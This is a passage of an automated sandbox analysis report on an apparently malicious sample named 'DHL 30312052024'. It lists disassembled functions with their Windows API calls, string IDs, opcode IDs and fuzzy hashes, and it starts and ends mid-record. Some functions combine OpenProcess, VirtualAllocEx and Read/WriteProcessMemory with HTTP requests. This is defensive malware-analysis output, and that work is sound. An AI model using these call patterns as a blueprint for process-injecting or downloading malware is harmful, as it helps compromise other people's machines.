                                                                                        • Instruction Fuzzy Hash: 1451CE71608B01AFE7349E28D885A6FB7E8EF95350F040A2DF8A1D6191DB70DE44E752
                                                                                        Function 00C897F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(013BFD88,?), ref: 00C89863
                                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00C89896
                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C89903
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3880355969-2594219639
                                                                                        • Opcode ID: ae0aa8ed366ccba3101f53bd1e3cb5e61741889ea347a4cbfe8701ec3161095d
                                                                                        • Instruction ID: 000628c5cc03e9329ebe9b08bebe86fb0ad46e269ac020aefebdaa1a10b923c9
                                                                                        • Opcode Fuzzy Hash: ae0aa8ed366ccba3101f53bd1e3cb5e61741889ea347a4cbfe8701ec3161095d
                                                                                        • Instruction Fuzzy Hash: BB512E74A00209AFCF10DF54D884ABE7BB5FF56364F14825DF8659B2A0D731AE81CB94
                                                                                        Function 00C59A80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C59AD2
                                                                                        • __itow.LIBCMT ref: 00C59B03
                                                                                          • Part of subcall function 00C59D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C59DBE
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C59B6C
                                                                                        • __itow.LIBCMT ref: 00C59BC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3379773720-2594219639
                                                                                        • Opcode ID: 907f85a98e2b66bf82b3fd9dfdac6e096904857466a308aa0aa3c86c8ffc541c
                                                                                        • Instruction ID: 14882f9cd4f54db734b9b211ab4c84af39d9b52576bc9fb7e4951be14d043d9e
                                                                                        • Opcode Fuzzy Hash: 907f85a98e2b66bf82b3fd9dfdac6e096904857466a308aa0aa3c86c8ffc541c
                                                                                        • Instruction Fuzzy Hash: C941D274A00208EBEF25EF10D845BEE7BB9EF44711F0000A9FD15A3291DB70AE89DB65
                                                                                        Function 00C597F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C59296,?,?,00000034,00000800,?,00000034), ref: 00C614E6
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C5983F
                                                                                          • Part of subcall function 00C61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C614B1
                                                                                          • Part of subcall function 00C613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C61409
                                                                                          • Part of subcall function 00C613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C61419
                                                                                          • Part of subcall function 00C613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C6142F
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C598AC
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C598F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @$@U=u
                                                                                        • API String ID: 4150878124-826235744
                                                                                        • Opcode ID: b2ffbcd7788e191d30a11c2a0b9cc706e33a530029ad00ad290f97a9baa5bd35
                                                                                        • Instruction ID: b869391ff22ac6798eab2a6c77cfafeb4c748dc147028df3b932a882593c8320
                                                                                        • Opcode Fuzzy Hash: b2ffbcd7788e191d30a11c2a0b9cc706e33a530029ad00ad290f97a9baa5bd35
                                                                                        • Instruction Fuzzy Hash: 4441417690021CBFDB20DFA4CC81ADEBBB8EB05301F144199F955B7191DA716F89DBA0
                                                                                        Function 00C5D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C5D5D4
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C5D60A
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C5D61B
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C5D69D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 1c53f2edbadf03f02da56e674cc14511652548c7951dd4fc3f6722e3b6b6de31
                                                                                        • Instruction ID: 5691dba65d84f0172556d1885ccf812d5f1da2fb3145bf888523730f18d8fbf6
                                                                                        • Opcode Fuzzy Hash: 1c53f2edbadf03f02da56e674cc14511652548c7951dd4fc3f6722e3b6b6de31
                                                                                        • Instruction Fuzzy Hash: 464192B5500304EFDF24DF14C888B9A7BA9EF44311F1585A9BC0ADF205DBB0DA89CBA4
                                                                                        Function 00C62753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C627C0
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C627DC
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00C62822
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CC5890,00000000), ref: 00C6286B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: 89f0490904a01f0e888dd50ed8d8ef7a465a99879aaff0a92f3d3bd062143888
                                                                                        • Instruction ID: 39e6117a3f5fe28618e6bee712391039c396ad7fe4f2d865bdeddc5b0604c20f
                                                                                        • Opcode Fuzzy Hash: 89f0490904a01f0e888dd50ed8d8ef7a465a99879aaff0a92f3d3bd062143888
                                                                                        • Instruction Fuzzy Hash: 8141AE726047019FD724DF28CC84F1ABBE8EF89314F044A2DF9A5972D1D730A905DB62
                                                                                        Function 00C88851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C888DE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 634782764-2594219639
                                                                                        • Opcode ID: 4a567e3bb0ab131e611db880b4fd9af097286ca3b1e2911c50befee7de83fec0
                                                                                        • Instruction ID: ac17d0fb24d682155836527c7c4fc2bdfaa1f6537520579a559dec1ba2114caa
                                                                                        • Opcode Fuzzy Hash: 4a567e3bb0ab131e611db880b4fd9af097286ca3b1e2911c50befee7de83fec0
                                                                                        • Instruction Fuzzy Hash: 3D31F634600109AFEF20BA58CC45FBD77A4EB0A328FD44115FA21D69E1CE31EA88975E
                                                                                        Function 00C7D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C7D7C5
                                                                                          • Part of subcall function 00C0784B: _memmove.LIBCMT ref: 00C07899
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower_memmove
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 3425801089-567219261
                                                                                        • Opcode ID: 7e06c2563370acce8d73a00cedc55b8fcf7c05956e0bae0dbe733b1e4b00e80c
                                                                                        • Instruction ID: aa59bb8f1a792e559daddcec1ee35dcd71d9ef4ff59c017062cc6aed33d82774
                                                                                        • Opcode Fuzzy Hash: 7e06c2563370acce8d73a00cedc55b8fcf7c05956e0bae0dbe733b1e4b00e80c
                                                                                        • Instruction Fuzzy Hash: E8318171904615AFCF04EF54C8919EEB3B5FF04320F108629F87A976D2DB71A905DB80
                                                                                        Function 00C7182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C7184C
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C71872
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C718A2
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00C718E9
                                                                                          • Part of subcall function 00C72483: GetLastError.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C72498
                                                                                          • Part of subcall function 00C72483: SetEvent.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C724AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 3113390036-3916222277
                                                                                        • Opcode ID: a5cce7fdea7b0a5a15f682bb01ea9581c0106ff4695537fcef9b90590336da51
                                                                                        • Instruction ID: 327ae86b2f84ecf436de1d846127edd8af97d34f850c85bfd7b79d147743d8cf
                                                                                        • Opcode Fuzzy Hash: a5cce7fdea7b0a5a15f682bb01ea9581c0106ff4695537fcef9b90590336da51
                                                                                        • Instruction Fuzzy Hash: 7921D0B1500208BFEB119F69DC85FBF77ECEB48744F14812AF80996180DA249E0567A1
                                                                                        Function 00C863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C01D73
                                                                                          • Part of subcall function 00C01D35: GetStockObject.GDI32(00000011), ref: 00C01D87
                                                                                          • Part of subcall function 00C01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C01D91
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C86461
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00C86468
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C8647D
                                                                                        • DestroyWindow.USER32(?), ref: 00C86485
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: 28124339367acb0a6400c9e93e6ad93f15c0b1fee7a716040a3eeafc6dcc25c3
                                                                                        • Instruction ID: c478f72ebd37585535961e5ad684dce6d4ef9b9e84258e58d36986edd9ca823c
                                                                                        • Opcode Fuzzy Hash: 28124339367acb0a6400c9e93e6ad93f15c0b1fee7a716040a3eeafc6dcc25c3
                                                                                        • Instruction Fuzzy Hash: BF218E71110215ABEF10AF64DC80FBF77A9EB98328F204629FA20921A0D771DC41A768
                                                                                        Function 00C66D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C66DBC
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C66DEF
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C66E01
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C66E3B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: c62d107564fa33a96edfc7cdfbafb7628a907751031946c7b717637f613d3b9e
                                                                                        • Instruction ID: f16110ce7e84c00bafd6e213a304c29efd9c423e3ceb07678237acc88e814637
                                                                                        • Opcode Fuzzy Hash: c62d107564fa33a96edfc7cdfbafb7628a907751031946c7b717637f613d3b9e
                                                                                        • Instruction Fuzzy Hash: 0F21AC74600209ABDB309F29DC85B9E7BE8EF44720F204A29FCA0D72D0DB719A11CB54
                                                                                        Function 00C66E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C66E89
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C66EBB
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C66ECC
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C66F06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: aafd94e36c0bc6b0aa5ae81781f8d29fb96b9648ded7f3e4a4a3b7e40466c496
                                                                                        • Instruction ID: 6386281cb7f588992e13d062efee0a79fda7cfd605c858513604a5ccf747f99f
                                                                                        • Opcode Fuzzy Hash: aafd94e36c0bc6b0aa5ae81781f8d29fb96b9648ded7f3e4a4a3b7e40466c496
                                                                                        • Instruction Fuzzy Hash: FA21AF79600705ABDB309F69DC84BAA77A8EF45720F200B19FCB1E72D0DB71A951CB60
                                                                                        Function 00C6AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C6AC54
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C6ACA8
                                                                                        • __swprintf.LIBCMT ref: 00C6ACC1
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C8F910), ref: 00C6ACFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 8d729be049e523750620e07a8b73b145eeba87e28674bbb36841271c4abf949c
                                                                                        • Instruction ID: 3ddf779deb78782a6edf922ec003b82c5f00dee3d0784d67e75c0798694dea10
                                                                                        • Opcode Fuzzy Hash: 8d729be049e523750620e07a8b73b145eeba87e28674bbb36841271c4abf949c
                                                                                        • Instruction Fuzzy Hash: 3B217131A00109AFCB10EF65C985EAE7BB8FF49314B0040A9F909EB252DA31EA41DB21
                                                                                        Function 00C61AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00C61B19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                        • API String ID: 3964851224-769500911
                                                                                        • Opcode ID: 2d34998fec51b00107b99dc27e02d312fb960563ed4e04e9151ce17f57841c73
                                                                                        • Instruction ID: cb9c23233bffa17896f2511f265b9ef280dcf832c68cb6f76336ac70e0aaace6
                                                                                        • Opcode Fuzzy Hash: 2d34998fec51b00107b99dc27e02d312fb960563ed4e04e9151ce17f57841c73
                                                                                        • Instruction Fuzzy Hash: DD1161B0900118CFCF10EF94D8919FEB7B4FF65304F584469D825A7692EB325D0AEB50
                                                                                        Function 00C7EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C7EC07
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C7EC37
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C7ED6A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C7EDEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: c36ced11bdb13a8fa317b0accda4cb5fda18d5fcb83004d3b33c8d9a31aba803
                                                                                        • Instruction ID: 12fc103e2420aea773b6af2e2f6f23da46bbefb5cda336aa65822799b54f9a39
                                                                                        • Opcode Fuzzy Hash: c36ced11bdb13a8fa317b0accda4cb5fda18d5fcb83004d3b33c8d9a31aba803
                                                                                        • Instruction Fuzzy Hash: 23816CB16047019FD720EF28C886B2AB7E5EF58710F04C95DF9A99B3D2DAB0AD40CB55
                                                                                        Function 00C2541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
